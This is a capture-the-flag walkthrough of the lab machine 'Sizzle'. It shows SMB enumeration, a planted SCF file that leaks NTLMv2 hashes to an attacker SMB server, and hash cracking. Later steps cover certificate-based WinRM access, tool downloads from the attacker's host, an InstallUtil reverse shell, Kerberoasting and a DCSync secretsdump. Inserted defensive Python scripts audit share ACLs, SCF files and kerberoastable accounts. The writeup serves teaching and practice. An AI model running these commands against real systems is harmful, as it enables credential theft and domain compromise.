Sizzle

Last updated 2 years ago

Enumeration

As usual, we start with an nmap scan, in order to find open ports in the target machine.

The following nmap command will scan the target machine looking for open ports quickly and saving the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.103 -oN allPorts

  • -sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.

  • --min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.

  • -p- scanning the entire port range, from 1 to 65535.

  • -T5 insane mode, the fastest of nmap's timing templates.

  • -Pn skip host discovery and treat the host as online.

  • -n scan without reverse DNS resolution.

  • -oN save the scan result into a file, in this case allPorts.

# Nmap 7.93 scan initiated Tue Mar 21 11:06:25 2023 as: nmap -sS --min-rate 5000 -p- -n -Pn -oN allPorts 10.10.10.103
Nmap scan report for 10.10.10.103
Host is up (0.047s latency).
Not shown: 65506 filtered tcp ports (no-response)
PORT      STATE SERVICE
21/tcp    open  ftp
53/tcp    open  domain
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
443/tcp   open  https
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
5986/tcp  open  wsmans
9389/tcp  open  adws
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49677/tcp open  unknown
49688/tcp open  unknown
49689/tcp open  unknown
49691/tcp open  unknown
49694/tcp open  unknown
49706/tcp open  unknown
49710/tcp open  unknown
49717/tcp open  unknown

# Nmap done at Tue Mar 21 11:07:04 2023 -- 1 IP address (1 host up) scanned in 39.67 seconds

As we see, there are quite a lot of ports open.

Let's try to obtain the services and versions of these ports. The following command will scan these ports more in depth and save the result into a file:

nmap -sC -sV -p21,53,80,135,139,389,443,445,464,593,636,3268,3269,5985,5986,9389,47001,49664,49665,49666,49667,49677,49688,49689,49691,49694,49706,49710,49717 10.10.10.103 -oN targeted

  • -sC performs the scan using the default set of scripts.

  • -sV enables version detection.

  • -oN save the scan result into a file, in this case targeted.

# Nmap 7.93 scan initiated Tue Mar 21 11:10:41 2023 as: nmap -sCV -p21,53,80,135,139,389,443,445,464,593,636,3268,3269,5985,5986,9389,47001,49664,49665,49666,49667,49677,49688,49689,49691,49694,49706,49710,49717 -Pn -oN targeted 10.10.10.103
Nmap scan report for 10.10.10.103
Host is up (0.040s latency).

PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
|_ssl-date: 2023-03-21T10:16:59+00:00; +4m34s from scanner time.
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after:  2020-07-02T17:58:55
443/tcp   open  ssl/http      Microsoft IIS httpd 10.0
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Microsoft-IIS/10.0
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after:  2020-07-02T17:58:55
|_ssl-date: 2023-03-21T10:16:59+00:00; +4m35s from scanner time.
| tls-alpn: 
|   h2
|_  http/1.1
| http-methods: 
|_  Potentially risky methods: TRACE
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap
|_ssl-date: 2023-03-21T10:16:59+00:00; +4m35s from scanner time.
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after:  2020-07-02T17:58:55
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after:  2020-07-02T17:58:55
|_ssl-date: 2023-03-21T10:16:59+00:00; +4m35s from scanner time.
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after:  2020-07-02T17:58:55
|_ssl-date: 2023-03-21T10:16:59+00:00; +4m35s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
5986/tcp  open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:sizzle.HTB.LOCAL
| Not valid before: 2018-07-02T20:26:23
|_Not valid after:  2019-07-02T20:26:23
|_http-server-header: Microsoft-HTTPAPI/2.0
| tls-alpn: 
|   h2
|_  http/1.1
|_ssl-date: 2023-03-21T10:16:59+00:00; +4m35s from scanner time.
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  msrpc         Microsoft Windows RPC
49688/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49689/tcp open  msrpc         Microsoft Windows RPC
49691/tcp open  msrpc         Microsoft Windows RPC
49694/tcp open  msrpc         Microsoft Windows RPC
49706/tcp open  msrpc         Microsoft Windows RPC
49710/tcp open  msrpc         Microsoft Windows RPC
49717/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: SIZZLE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 4m34s, deviation: 0s, median: 4m34s
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2023-03-21T10:16:21
|_  start_date: 2023-03-21T10:02:36

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Mar 21 11:12:26 2023 -- 1 IP address (1 host up) scanned in 104.84 seconds

Let's start enumerating the SMB service. We can list the shares using the guest account.

smbmap -H 10.10.10.103 -u "guest"

[+] IP: 10.10.10.103:445        Name: htb.local                                         
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        CertEnroll                                              NO ACCESS       Active Directory Certificate Services share
        Department Shares                                       READ ONLY
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share 
        Operations                                              NO ACCESS
        SYSVOL                                                  NO ACCESS       Logon server share 

There is one share called Department Shares with READ ONLY permissions. This share contains a bunch of other subdirectories.

smbmap -H 10.10.10.103 -u "guest" -r "Department Shares"

[+] IP: 10.10.10.103:445        Name: htb.local
      Disk                                                    Permissions     Comment
      ----                                                    -----------     -------
      Department Shares                                       READ ONLY
      .\Department Shares\*
      dr--r--r--                0 Tue Jul  3 17:22:32 2018    .
      dr--r--r--                0 Tue Jul  3 17:22:32 2018    ..
      dr--r--r--                0 Mon Jul  2 21:21:43 2018    Accounting
      dr--r--r--                0 Mon Jul  2 21:14:28 2018    Audit
      dr--r--r--                0 Tue Jul  3 17:22:39 2018    Banking
      dr--r--r--                0 Mon Jul  2 21:15:01 2018    CEO_protected
      dr--r--r--                0 Mon Jul  2 21:22:06 2018    Devops
      dr--r--r--                0 Mon Jul  2 21:11:57 2018    Finance
      dr--r--r--                0 Mon Jul  2 21:16:11 2018    HR
      dr--r--r--                0 Mon Jul  2 21:14:24 2018    Infosec
      dr--r--r--                0 Mon Jul  2 21:13:59 2018    Infrastructure
      dr--r--r--                0 Mon Jul  2 21:12:04 2018    IT
      dr--r--r--                0 Mon Jul  2 21:12:09 2018    Legal
      dr--r--r--                0 Mon Jul  2 21:15:25 2018    M&A
      dr--r--r--                0 Mon Jul  2 21:14:43 2018    Marketing
      dr--r--r--                0 Mon Jul  2 21:11:47 2018    R&D
      dr--r--r--                0 Mon Jul  2 21:14:37 2018    Sales
      dr--r--r--                0 Mon Jul  2 21:21:46 2018    Security
      dr--r--r--                0 Mon Jul  2 21:16:54 2018    Tax
      dr--r--r--                0 Tue Jul 10 23:39:32 2018    Users
      dr--r--r--                0 Mon Jul  2 21:32:58 2018    ZZ_ARCHIVE

Inside the Users directory there are further subdirectories, named after what look like user accounts.

smbmap -H 10.10.10.103 -u "guest" -r "Department Shares\Users"

[+] IP: 10.10.10.103:445        Name: htb.local                                         
      Disk                                                    Permissions     Comment
      ----                                                    -----------     -------
      Department Shares                                       READ ONLY
      .\Department SharesUsers\*
      dr--r--r--                0 Tue Jul 10 23:39:32 2018    .
      dr--r--r--                0 Tue Jul 10 23:39:32 2018    ..
      dr--r--r--                0 Mon Jul  2 21:18:43 2018    amanda
      dr--r--r--                0 Mon Jul  2 21:19:06 2018    amanda_adm
      dr--r--r--                0 Mon Jul  2 21:18:28 2018    bill
      dr--r--r--                0 Mon Jul  2 21:18:31 2018    bob
      dr--r--r--                0 Mon Jul  2 21:19:14 2018    chris
      dr--r--r--                0 Mon Jul  2 21:18:39 2018    henry
      dr--r--r--                0 Mon Jul  2 21:18:34 2018    joe
      dr--r--r--                0 Mon Jul  2 21:18:53 2018    jose
      dr--r--r--                0 Tue Jul 10 23:39:32 2018    lkys37en
      dr--r--r--                0 Mon Jul  2 21:18:48 2018    morgan
      dr--r--r--                0 Mon Jul  2 21:19:20 2018    mrb3n
      dr--r--r--                0 Wed Sep 26 07:45:32 2018    Public

Now we have a list of usernames that may be useful later. Let's check whether we have write permissions on any of these directories. As the ACL shows, Everyone has full control over the Public directory.

smbcacls "//10.10.10.103/Department Shares" Users/Public -N

REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:Everyone:ALLOWED/OI|CI/FULL
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL
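The ACL above is the misconfiguration that enables the next step: an explicit ACE granting Everyone full control, as opposed to the inherited read-only ACE below it. As an added example (not from the writeup), this Python script parses smbcacls output and flags exactly that kind of ACE, so a share can be audited for it:

```python
import re

# Principals that effectively mean "any user on the network" for this check.
BROAD_PRINCIPALS = {"Everyone", "NT AUTHORITY\\Authenticated Users", "BUILTIN\\Users"}

# One ACE as smbcacls prints it: ACL:<trustee>:<ALLOWED|DENIED>/<flags>/<permissions>
ACE_RE = re.compile(
    r"^ACL:(?P<who>.+?):(?P<kind>ALLOWED|DENIED)/(?P<flags>[A-Z|]*)/(?P<perm>\S+)$")


def grants_write(perm):
    """True for FULL/CHANGE, or for a special-permission string that contains W."""
    return perm in {"FULL", "CHANGE"} or "W" in perm


def parse_aces(text):
    """One dict per ACL: line; REVISION/OWNER/GROUP lines are skipped."""
    aces = []
    for line in text.splitlines():
        m = ACE_RE.match(line.strip())
        if not m:
            continue
        flags = {f for f in m["flags"].split("|") if f}
        aces.append({
            "who": m["who"],
            "allowed": m["kind"] == "ALLOWED",
            "inherited": "I" in flags,                 # I = inherited from the parent
            "propagates": bool(flags & {"OI", "CI"}),  # applies to new files/folders too
            "perm": m["perm"],
        })
    return aces


def risky_aces(text):
    """Allow-ACEs that let a broad principal write; explicit ones sort first."""
    hits = [a for a in parse_aces(text)
            if a["allowed"] and a["who"] in BROAD_PRINCIPALS and grants_write(a["perm"])]
    return sorted(hits, key=lambda a: a["inherited"])


# The ACL smbcacls returned for Department Shares\Users\Public in the writeup.
SAMPLE = """REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\\Administrators
GROUP:HTB\\Domain Users
ACL:Everyone:ALLOWED/OI|CI/FULL
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\\SYSTEM:ALLOWED/OI|CI|I/FULL
"""

if __name__ == "__main__":
    for ace in risky_aces(SAMPLE):
        origin = "inherited" if ace["inherited"] else "explicit"
        print(f"{origin}: {ace['who']} has {ace['perm']} "
              f"(propagates to children: {ace['propagates']})")
```

Only the explicit Everyone/FULL entry is reported; the inherited Everyone/READ entry is the normal state of the share.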

Exploitation

This means that we can upload files to that directory. We could try to create a SCF (Shell Command File) in the Public directory. When a user opens this file, Windows will try to load its icon from our machine, authenticating to our SMB server and giving us their NTLMv2 hash.

nano pwn.scf

[Shell]
Command=2
IconFile=\\10.10.14.11\smbFolder\pwn.ico
[Taskbar]
Command=ToggleDesktop

Now upload it to the Public directory.

smbmap -H 10.10.10.103 -u "guest" --upload pwn.scf "Department Shares\Users\Public\pwn.scf"

Then start the SMB server. If any user opens the file, it will try to load the icon from our SMB server, giving us their NTLMv2 hash.

impacket-smbserver smbFolder $(pwd) -smb2support

Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.103,49303)
[*] AUTHENTICATE_MESSAGE (HTB\amanda,SIZZLE)
[*] User SIZZLE\amanda authenticated successfully
[*] amanda::HTB:aaaaaaaaaaaaaaaa:49dd44091b94b3f557a53d7cb7aa9a92:0101000000000000002e31e9255cd9010a5238f40c86656d000000000100100061007900550058006f00480065004d000300100061007900550058006f00480065004d000200100077005100460048005600510074004500040010007700510046004800560051007400450007000800002e31e9255cd90106000400020000000800300030000000000000000100000000200000bd5e1a6a5f1cc249073ee270b329409cdf07c12fc5a21f4f21f047786e2945680a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e0031003100000000000000000000000000
[*] Connecting Share(1:IPC$)
[-] SMB2_TREE_CONNECT not found share
[-] SMB2_TREE_CONNECT not found share

Copy the hash, paste it into a file, and try to break it with john.

john -w=/usr/share/wordlists/rockyou.txt hash

Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Ashare1972       (amanda)     
1g 0:00:00:04 DONE (2023-03-21 19:53) 0.2475g/s 2826Kp/s 2826Kc/s 2826KC/s Ashiah08..Ariel!
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
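The planted SCF is as easy to find as it is to plant, because the whole trick lives in one IconFile line pointing at a UNC path. As an added example (not from the writeup), this Python script parses SCF files the way pwn.scf above is structured and reports any whose icon is fetched from a host outside an allow-list; the allowed host name and the benign second file are assumptions:

```python
import configparser
import os
import re
import tempfile

# \\host\share\... : capture the host part of a UNC path.
UNC_RE = re.compile(r"^\\\\(?P<host>[^\\]+)\\")


def icon_target(scf_text):
    """IconFile value from the [Shell] section, or None if absent/unparseable."""
    cp = configparser.ConfigParser(interpolation=None)
    try:
        cp.read_string(scf_text)
    except configparser.Error:
        return None
    return cp.get("Shell", "IconFile", fallback=None)


def remote_icon_host(scf_text):
    """Host named by a UNC IconFile, or None when the icon is local or absent."""
    target = icon_target(scf_text)
    if not target:
        return None
    m = UNC_RE.match(target.strip())
    return m["host"].lower() if m else None


def scan_tree(root, allowed_hosts):
    """(path, host) for every .scf below root whose icon lives off an approved server."""
    allowed = {h.lower() for h in allowed_hosts}
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".scf"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                host = remote_icon_host(fh.read())
            if host and host not in allowed:
                hits.append((path, host))
    return hits


# Constructed samples: the pwn.scf from the writeup and a benign local-icon SCF.
PLANTED = ("[Shell]\r\nCommand=2\r\nIconFile=\\\\10.10.14.11\\smbFolder\\pwn.ico\r\n"
           "[Taskbar]\r\nCommand=ToggleDesktop\r\n")
BENIGN = "[Shell]\r\nCommand=2\r\nIconFile=%SystemRoot%\\system32\\SHELL32.dll,3\r\n"


def demo():
    """Lay the two samples out like Department Shares\\Users\\Public and scan them."""
    with tempfile.TemporaryDirectory() as root:
        public = os.path.join(root, "Users", "Public")
        os.makedirs(public)
        for name, body in (("pwn.scf", PLANTED), ("desktop.scf", BENIGN)):
            with open(os.path.join(public, name), "w", encoding="utf-8") as fh:
                fh.write(body)
        # The allow-list entry is an assumption for this example.
        return scan_tree(root, allowed_hosts=["sizzle.htb.local"])


if __name__ == "__main__":
    for path, host in demo():
        print(f"{path}: icon fetched from {host}")
```

Run against a mounted copy of the share, it flags pwn.scf and its 10.10.14.11 target; blocking outbound SMB at the perimeter is what stops the hash from leaving even when a file like this is missed.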

Let's keep enumerating the machine. As we saw in the nmap scan, port 5986 is open, which is WinRM over HTTPS. We may need to obtain our own certificate to be able to log in through it. Nmap also reported that port 80 is open, so let's take a look at it.

As we can see, the web server is Microsoft IIS 10.0. Let's try to enumerate website subdirectories using an IIS-specific wordlist.

gobuster dir -u http://10.10.10.103/ -w /opt/SecLists/Discovery/Web-Content/IIS.fuzz.txt -t 200 --no-error

===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.103/
[+] Method:                  GET
[+] Threads:                 200
[+] Wordlist:                /opt/SecLists/Discovery/Web-Content/IIS.fuzz.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/03/21 19:58:28 Starting gobuster in directory enumeration mode
===============================================================
//images/             (Status: 403) [Size: 1233]
//<script>alert('XSS')</script>.aspx (Status: 400) [Size: 3420]
//~/<script>alert('XSS')</script>.aspx (Status: 400) [Size: 3420]
//certenroll/         (Status: 403) [Size: 1233]
//certsrv/            (Status: 401) [Size: 1293]
//aspnet_client/      (Status: 403) [Size: 1233]
//certsrv/mscep_admin (Status: 401) [Size: 1293]
//certsrv/mscep/mscep.dll (Status: 401) [Size: 1293]

===============================================================
2023/03/21 19:58:29 Finished
===============================================================

The certsrv directory shows a 401 status code. If we take a look at it, it will ask for credentials. Let's use the ones we have.

We log into Active Directory Certificate Services.

The web enrollment interface will let us obtain a certificate that we can then use to authenticate to the WinRM service over SSL. First, create a private key and a certificate signing request.

openssl req -newkey rsa:2048 -nodes -keyout amanda.key -out amanda.csr

.+...+.......+.....+.+..+...+......+...+............+++++++++++++++++++++++++++++++++...+..+.............+...........+...+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:
State or Province Name (full name) [Some-State]:
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:
Email Address []:

Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:

Now, on the website, go to Request a certificate.

Then go to advanced certificate request, copy and paste the amanda.csr certificate signing request into the Saved Request field, and press Submit.

Download the certificate by clicking on Download certificate.

Finally, we can log into the machine using the WinRM service and the SSL certificates.

evil-winrm -i 10.10.10.103 -u 'amanda' -p 'Ashare1972' -S -c certnew.cer -k amanda.key

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Warning: SSL enabled

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\amanda\Documents> whoami
htb\amanda

Privilege Escalation

The shell we have is quite limited: it is running in constrained language mode.

$executioncontext.sessionstate.languagemode

ConstrainedLanguage

We need to bypass this limited shell. Set up a simple HTTP server in the directory where the PsBypassCLM.exe binary is located:

python -m http.server 80

Now, create the privEsc folder inside \Windows\Temp, and download the PsBypassCLM.exe binary from our HTTP server there.

mkdir \windows\temp\privEsc; cd \windows\temp\privEsc

iwr http://10.10.14.11/PsBypassCLM.exe -outfile PsBypassCLM.exe

Now, set a netcat listener on port 4444.

rlwrap nc -lvnp 4444

Finally, run the following command and catch the reverse shell, this time in full language mode.

C:\windows\temp\privesc> C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /revshell=true /rhost=10.10.14.11 /rport=4444 /U c:\windows\temp\privEsc\PsBypassCLM.exe

Listening on 0.0.0.0 4444
Connection received on 10.10.10.103 59777
whoami
htb\amanda
PS C:\windows\temp\privesc> $executioncontext.sessionstate.languagemode
FullLanguage

As we have credentials, we can run the BloodHound collector remotely with the bloodhound-python tool. Make sure to add an htb.local entry to the /etc/hosts file first.

bloodhound-python -c All -u 'amanda' -p 'Ashare1972' -ns 10.10.10.103 -d htb.local

INFO: Found AD domain: htb.local
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (htb.local:88)] [Errno 110] Connection timed out
INFO: Connecting to LDAP server: sizzle.HTB.LOCAL
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: sizzle.HTB.LOCAL
INFO: Found 8 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: sizzle.HTB.LOCAL
INFO: Done in 00M 08S

Now, we have to start BloodHound. First, we have to start neo4j.

neo4j console

Then browse to localhost on port 4747 and log in with the username neo4j and password neo4j. You'll have to change the password.

On a new console, run BloodHound.

bloodhound -nosandbox

Then log in with the credentials you set earlier.

Then, click on the Upload Data button on the right section and select all the .json files.

Once all the .json files are uploaded, go to the Analysis section. There we'll see that the MRLKY user has a Kerberoastable account.

We can't exploit this vulnerability yet, because port 88 (Kerberos) is not exposed externally. We can also see that this user has DCSync rights, which we could exploit to gain domain admin privileges.

A user with the DCSync permission can impersonate a Domain Controller and request account password data from the real Domain Controller.

Let's start with the Kerberoasting attack. As the netstat output shows, Kerberos (port 88) is only listening internally.

netstat -nat

Active Connections

  Proto  Local Address          Foreign Address        State           Offload State

...
  TCP    0.0.0.0:88             0.0.0.0:0              LISTENING       InHost
...

To exploit this vulnerability, we'll have to use Rubeus. Set a simple HTTP server where the Rubeus.exe binary is located.

python -m http.server 80

Download the binary on the victim machine.

iwr http://10.10.14.11/Rubeus.exe -outfile Rubeus.exe

Finally, exploit the kerberoasting vulnerability using the credentials of the amanda user. We should get the hash of the MRLKY user.

.\Rubeus.exe kerberoast /creduser:htb.local\amanda /credpassword:Ashare1972

   ______        _                                                                                                     
  (_____ \      | |                                                                                                    
   _____) )_   _| |__  _____ _   _  ___                                                                                
  |  __  /| | | |  _ \| ___ | | | |/___)                                                                               
  | |  \ \| |_| | |_) ) ____| |_| |___ |                                                                               
  |_|   |_|____/|____/|_____)____/(___/                                                                                
                                                                                                                       
  v2.0.2                                                                                                               
                                                                                                                       
                                                                                                                       
[*] Action: Kerberoasting                                                                                              

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*]         Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

[*] Target Domain          : HTB.LOCAL
[*] Searching path 'LDAP://sizzle.HTB.LOCAL/DC=HTB,DC=LOCAL' for '(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'

[*] Total kerberoastable users : 1


[*] SamAccountName         : mrlky
[*] DistinguishedName      : CN=mrlky,CN=Users,DC=HTB,DC=LOCAL
[*] ServicePrincipalName   : http/sizzle
[*] PwdLastSet             : 7/10/2018 2:08:09 PM
[*] Supported ETypes       : RC4_HMAC_DEFAULT

Copy the hash, and break it with john.

john -w=/usr/share/wordlists/rockyou.txt kerb_hash

Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Football#7       (?)     
1g 0:00:00:04 DONE (2023-03-21 21:08) 0.2247g/s 2509Kp/s 2509Kc/s 2509KC/s Forever3!..Flubb3r
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
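Rubeus found mrlky with the LDAP filter it printed above. As an added example (not from the writeup), here is the same predicate applied in Python to a constructed set of account records, extended with the two attributes a defender should review for each hit: whether the account still accepts RC4 service tickets (the RC4_HMAC_DEFAULT shown above is how Rubeus reports an unset msDS-SupportedEncryptionTypes) and how old the password is. The svc_backup and db01 names are made up for the sample.

```python
from datetime import datetime, timezone

SAM_NORMAL_USER_ACCOUNT = 805306368   # samAccountType of user objects
UAC_ACCOUNTDISABLE = 0x0002           # bit tested by the 1.2.840.113556.1.4.803 rule
ETYPE_RC4 = 0x04                      # msDS-SupportedEncryptionTypes bits
ETYPE_AES128 = 0x08
ETYPE_AES256 = 0x10


def is_kerberoastable(acct):
    """Python form of (&(samAccountType=805306368)(servicePrincipalName=*)
    (!samAccountName=krbtgt)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))."""
    return (acct.get("samAccountType") == SAM_NORMAL_USER_ACCOUNT
            and bool(acct.get("servicePrincipalName"))
            and acct.get("sAMAccountName", "").lower() != "krbtgt"
            and not acct.get("userAccountControl", 0) & UAC_ACCOUNTDISABLE)


def rc4_ticket_allowed(acct):
    """True when a service ticket for this account can be issued with etype 23 (RC4).
    An unset attribute falls back to RC4, which Rubeus labels RC4_HMAC_DEFAULT."""
    supported = acct.get("msDS-SupportedEncryptionTypes") or 0
    return supported == 0 or bool(supported & ETYPE_RC4)


def audit(accounts, now, max_password_age_days=365):
    """(name, spns, issues) for each kerberoastable account, most issues first."""
    findings = []
    for acct in accounts:
        if not is_kerberoastable(acct):
            continue
        issues = []
        if rc4_ticket_allowed(acct):
            issues.append("rc4-ticket-allowed")
        age_days = (now - acct["pwdLastSet"]).days
        if age_days > max_password_age_days:
            issues.append(f"password-age-{age_days}d")
        findings.append((acct["sAMAccountName"],
                         sorted(acct["servicePrincipalName"]), issues))
    return sorted(findings, key=lambda f: -len(f[2]))


# Constructed directory snapshot modelled on the Rubeus output above.
NOW = datetime(2023, 3, 21, tzinfo=timezone.utc)
ACCOUNTS = [
    {"sAMAccountName": "mrlky", "samAccountType": SAM_NORMAL_USER_ACCOUNT,
     "servicePrincipalName": ["http/sizzle"], "userAccountControl": 0x200,
     "msDS-SupportedEncryptionTypes": None,
     "pwdLastSet": datetime(2018, 7, 10, 14, 8, 9, tzinfo=timezone.utc)},
    {"sAMAccountName": "krbtgt", "samAccountType": SAM_NORMAL_USER_ACCOUNT,
     "servicePrincipalName": ["kadmin/changepw"], "userAccountControl": 0x202,
     "msDS-SupportedEncryptionTypes": None,
     "pwdLastSet": datetime(2018, 7, 2, tzinfo=timezone.utc)},
    {"sAMAccountName": "amanda", "samAccountType": SAM_NORMAL_USER_ACCOUNT,
     "servicePrincipalName": [], "userAccountControl": 0x200,
     "msDS-SupportedEncryptionTypes": None,
     "pwdLastSet": datetime(2018, 7, 2, tzinfo=timezone.utc)},
    # svc_backup / db01 are invented to show an AES-only account with a fresh password.
    {"sAMAccountName": "svc_backup", "samAccountType": SAM_NORMAL_USER_ACCOUNT,
     "servicePrincipalName": ["MSSQLSvc/db01.htb.local:1433"], "userAccountControl": 0x200,
     "msDS-SupportedEncryptionTypes": ETYPE_AES128 | ETYPE_AES256,
     "pwdLastSet": datetime(2023, 1, 5, tzinfo=timezone.utc)},
    {"sAMAccountName": "SIZZLE$", "samAccountType": 805306369,   # machine account
     "servicePrincipalName": ["HOST/sizzle.htb.local"], "userAccountControl": 0x1000,
     "msDS-SupportedEncryptionTypes": ETYPE_RC4 | ETYPE_AES128 | ETYPE_AES256,
     "pwdLastSet": datetime(2023, 3, 1, tzinfo=timezone.utc)},
]

if __name__ == "__main__":
    for name, spns, issues in audit(ACCOUNTS, NOW):
        print(f"{name:12} {', '.join(spns):32} {' '.join(issues) or 'ok'}")
```

mrlky is reported with both an RC4-capable ticket and a password unchanged since 2018, which is exactly the combination that made the crack above take four seconds; the AES-only account with a recent password is listed but carries no finding.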

Now that we have credentials for MRLKY, and as that account has DCSync rights, we can dump the hashes of every account in the domain remotely with secretsdump.

impacket-secretsdump htb.local/mrlky:'Football#7'@10.10.10.103

Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

